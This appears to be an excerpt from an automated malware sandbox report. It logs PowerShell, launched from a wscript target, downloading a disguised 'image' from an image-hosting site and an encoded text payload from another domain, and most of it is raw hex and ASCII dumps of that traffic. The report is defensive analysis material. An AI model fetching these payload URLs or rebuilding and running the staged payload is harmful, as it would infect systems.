2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 Data Ascii: 4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@B
2024-05-04 07:48:38 UTC	1369	IN	Data Raw: 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49708	172.67.215.45	443	1672	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:40 UTC	100	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br
2024-05-04 07:48:40 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:40 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 2 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vaPUZKOg8Cj1xARIkgfvHGerVeLmvjaa9i1ZM80q7nOtrlzIe7VBHOT5uWxk%2FklzaTwbNjKIROirCkDZxpnRk0gDQHI%2Bs33A91lGkELJdeCsA%2FdCfsa6WPk5ZJFxf9EKmnLrp9aKUANy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e6e3cb3d6578ea-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 07:48:40 UTC	677	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 Data Ascii: TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4ApC.
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 Data Ascii: Ay2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 Data Ascii: r7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(h
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 Data Ascii: HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 Data Ascii: f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 Data Ascii: nq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@BH5
2024-05-04 07:48:40 UTC	1369	IN	Data Raw: 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd Data Ascii: K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49709	131.153.147.50	443	1672	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 07:48:47 UTC	79	OUT	GET /nm/xwomay.txt HTTP/1.1 Host: www.evolve27.com Connection: Keep-Alive
2024-05-04 07:48:47 UTC	208	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 07:48:47 GMT Server: Apache Last-Modified: Thu, 02 May 2024 15:35:07 GMT Accept-Ranges: bytes Content-Length: 47788 Connection: close Content-Type: text/plain
2024-05-04 07:48:47 UTC	7984	IN	Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-05-04 07:48:48 UTC	8000	IN	Data Raw: 66 41 41 41 6a 41 77 49 41 4d 43 41 67 6b 41 41 41 41 43 41 67 41 77 49 41 4d 43 41 6a 73 41 41 41 30 46 41 4f 42 77 54 41 41 43 41 36 41 77 53 41 4d 45 41 50 42 41 54 41 4d 46 41 51 42 51 51 41 4d 45 41 62 31 42 41 41 30 46 41 47 42 67 52 41 38 45 41 67 41 67 4f 41 73 45 41 44 42 77 54 41 77 45 41 54 42 41 55 41 45 45 41 44 42 77 57 66 41 41 41 73 42 51 59 41 51 48 41 70 42 41 63 41 45 47 41 44 39 41 41 41 30 46 41 69 42 51 59 41 51 46 41 62 74 41 41 41 49 47 41 68 42 41 56 48 41 41 41 64 42 67 54 41 6b 45 41 58 42 77 57 4c 41 41 41 75 42 51 61 41 63 46 41 4d 6c 41 41 41 30 46 41 72 42 77 59 41 45 47 41 43 42 77 57 4e 41 41 41 72 42 77 59 41 45 47 41 43 6c 41 41 41 6b 48 41 6c 42 77 53 41 51 48 41 6d 42 51 61 41 67 47 41 54 42 41 54 54 41 41 41 64 42 41 Data Ascii: fAAAjAwIAMCAgkAAAACAgAwIAMCAjsAAA0FAOBwTAACA6AwSAMEAPBATAMFAQBQQAMEAb1BAA0FAGBgRA8EAgAgOAsEADBwTAwEATBAUAEEADBwWfAAAsBQYAQHApBAcAEGAD9AAA0FAiBQYAQFAbtAAAIGAhBAVHAAAdBgTAkEAXBwWLAAAuBQaAcFAMlAAA0FArBwYAEGACBwWNAAArBwYAEGAClAAAkHAlBwSAQHAmBQaAgGATBATTAAAdBA
2024-05-04 07:48:48 UTC	8000	IN	Data Raw: 30 35 57 5a 32 56 45 41 7a 64 57 59 73 5a 45 64 6c 74 32 59 76 4e 46 41 30 4e 57 5a 75 35 32 62 44 42 67 63 6c 64 57 5a 30 35 57 53 76 52 46 41 6c 70 58 61 54 4a 58 5a 6d 5a 57 64 43 52 6d 62 6c 4e 31 58 30 56 32 63 41 55 6d 65 70 4e 6c 63 6c 5a 6d 5a 31 4a 55 5a 32 6c 57 5a 6a 56 6d 55 66 52 58 5a 7a 42 51 5a 30 6c 6e 51 41 55 47 63 35 52 46 62 76 4e 32 62 30 39 6d 63 51 42 51 5a 77 6c 48 56 30 56 32 61 6a 39 32 55 41 6b 48 62 70 31 57 59 47 4e 33 63 6c 4a 48 5a 6b 46 45 41 72 4e 57 59 69 78 47 62 68 4e 6b 63 6c 31 57 61 55 42 51 4e 66 39 46 4a 68 52 6d 59 74 46 47 54 66 42 41 4d 68 42 41 4e 66 39 46 4a 68 52 6d 59 74 46 47 54 66 42 51 5a 30 56 6e 59 70 4a 48 64 30 46 45 5a 68 56 6d 63 6f 52 56 51 55 4e 46 41 6c 35 32 54 30 6c 57 59 58 42 51 5a 73 52 6d Data Ascii: 05WZ2VEAzdWYsZEdlt2YvNFA0NWZu52bDBgcldWZ05WSvRFAlpXaTJXZmZWdCRmblN1X0V2cAUmepNlclZmZ1JUZ2lWZjVmUfRXZzBQZ0lnQAUGc5RFbvN2b09mcQBQZwlHV0V2aj92UAkHbp1WYGN3clJHZkFEArNWYixGbhNkcl1WaUBQNf9FJhRmYtFGTfBAMhBANf9FJhRmYtFGTfBQZ0VnYpJHd0FEZhVmcoRVQUNFAl52T0lWYXBQZsRm
2024-05-04 07:48:48 UTC	8000	IN	Data Raw: 75 41 68 6d 43 6b 54 42 6f 41 42 6a 43 45 54 42 69 41 42 69 43 45 43 41 54 45 67 4e 41 45 6d 41 4a 46 67 4e 43 45 43 41 41 44 42 65 42 45 56 42 54 38 51 2b 43 45 52 42 4d 45 67 4e 43 45 52 42 47 38 67 79 43 6b 41 42 34 2f 67 6b 43 45 41 42 6d 4c 51 54 42 45 50 42 67 2f 67 64 42 6b 50 42 51 7a 77 4d 42 45 43 41 78 4a 51 54 42 6b 48 41 39 2f 77 51 42 45 46 41 78 39 77 4d 42 6b 4f 42 4b 2f 51 4a 42 45 46 42 45 2f 51 44 42 45 43 41 78 35 67 2f 42 45 4f 41 41 37 51 38 42 45 46 41 54 45 67 4e 42 45 4f 42 38 35 41 34 42 6b 4e 42 78 47 67 4e 41 45 6b 41 47 45 67 4e 42 6b 4b 42 69 4f 67 31 41 45 6a 41 47 45 67 4e 41 45 4a 42 63 36 41 76 41 45 44 42 58 36 67 73 42 6b 45 42 53 36 77 6e 41 45 44 42 53 36 51 69 41 45 44 41 54 45 67 4e 41 6b 44 42 46 47 67 4e 41 45 7a Data Ascii: uAhmCkTBoABjCETBiABiCECATEgNAEmAJFgNCECAADBeBEVBT8Q+CERBMEgNCERBG8gyCkAB4/gkCEABmLQTBEPBg/gdBkPBQzwMBECAxJQTBkHA9/wQBEFAx9wMBkOBK/QJBEFBE/QDBECAx5g/BEOAA7Q8BEFATEgNBEOB85A4BkNBxGgNAEkAGEgNBkKBiOg1AEjAGEgNAEJBc6AvAEDBX6gsBkEBS6wnAEDBS6QiAEDATEgNAkDBFGgNAEz
2024-05-04 07:48:48 UTC	8000	IN	Data Raw: 41 59 43 4b 48 34 74 43 41 41 67 4a 6f 6f 41 63 41 77 51 39 79 70 41 41 41 51 43 4b 5a 34 39 47 65 72 67 42 41 41 51 58 6f 6f 41 41 41 4d 46 4b 48 49 61 41 41 41 77 6a 4d 71 41 41 42 67 77 62 4b 41 51 41 48 4d 6e 43 41 45 67 42 6f 6f 41 41 42 55 41 4b 61 63 67 6f 4b 41 41 41 50 68 53 47 48 49 71 43 41 41 67 57 6f 67 78 42 69 71 41 41 41 77 45 4b 58 63 67 6f 42 41 41 41 70 78 6f 43 41 45 41 42 6f 59 78 42 4c 45 41 41 41 4d 51 6a 62 45 42 41 41 51 44 41 41 41 77 63 41 4d 41 4d 62 6f 69 42 41 73 69 43 4b 41 41 41 34 2f 6d 41 4b 41 51 41 44 67 53 45 41 41 77 4d 41 41 41 41 51 41 67 41 77 4d 68 4b 47 41 77 4b 4b 6f 41 41 41 34 38 62 43 6f 41 41 42 4d 41 4b 52 41 41 41 79 41 41 41 41 41 42 41 43 41 7a 45 42 41 41 41 6e 77 41 41 72 73 43 41 41 41 41 41 41 41 41 Data Ascii: AYCKH4tCAAgJooAcAwQ9ypAAAQCKZ49GergBAAQXooAAAMFKHIaAAAwjMqAABgwbKAQAHMnCAEgBooAABUAKacgoKAAAPhSGHIqCAAgWogxBiqAAAwEKXcgoBAAApxoCAEABoYxBLEAAAMQjbEBAAQDAAAwcAMAMboiBAsiCKAAA4/mAKAQADgSEAAwMAAAAQAgAwMhKGAwKKoAAA48bCoAABMAKRAAAyAAAAABACAzEBAAAnwAArsCAAAAAAAA
2024-05-04 07:48:48 UTC	7804	IN	Data Raw: 4b 41 41 41 4d 69 69 42 41 41 77 57 6f 59 41 41 41 45 47 4b 4b 41 41 41 70 39 57 44 52 6f 41 41 41 77 49 4b 45 41 41 41 5a 34 6e 43 41 41 41 6a 6f 59 41 41 41 77 46 4b 4b 41 41 41 4d 69 43 42 41 41 51 47 2b 42 48 41 46 45 6b 63 4b 41 41 41 63 2b 6d 43 41 41 77 6d 6f 30 51 45 4f 45 68 43 41 41 67 6d 76 68 42 46 52 6f 41 41 41 6b 4a 4b 4b 41 41 41 56 2b 47 44 52 6f 41 41 41 51 35 62 4d 45 68 46 57 51 68 45 56 45 68 43 41 41 51 6d 6f 41 41 41 41 77 4a 49 41 41 51 41 41 41 69 46 57 55 68 45 4d 45 78 43 52 73 77 45 4b 41 41 41 54 69 69 44 52 34 77 45 4b 41 41 41 59 4f 48 41 41 41 41 6e 67 41 41 41 42 41 41 49 4e 4d 68 43 41 41 51 51 7a 70 41 41 41 63 35 62 41 77 4d 41 67 41 53 43 52 59 68 46 57 59 42 43 52 6f 41 41 41 59 4a 4b 4b 41 41 41 56 2b 47 44 52 6f 41 Data Ascii: KAAAMiiBAAwWoYAAAEGKKAAAp9WDRoAAAwIKEAAAZ4nCAAAjoYAAAwFKKAAAMiCBAAQG+BHAFEkcKAAAc+mCAAwmo0QEOEhCAAgmvhBFRoAAAkJKKAAAV+GDRoAAAQ5bMEhFWQhEVEhCAAQmoAAAAwJIAAQAAAiFWUhEMExCRswEKAAATiiDR4wEKAAAYOHAAAAngAAABAAINMhCAAQQzpAAAc5bAwMAgASCRYhFWYBCRoAAAYJKKAAAV+GDRoA

Target ID:	0
Start time:	09:47:56
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
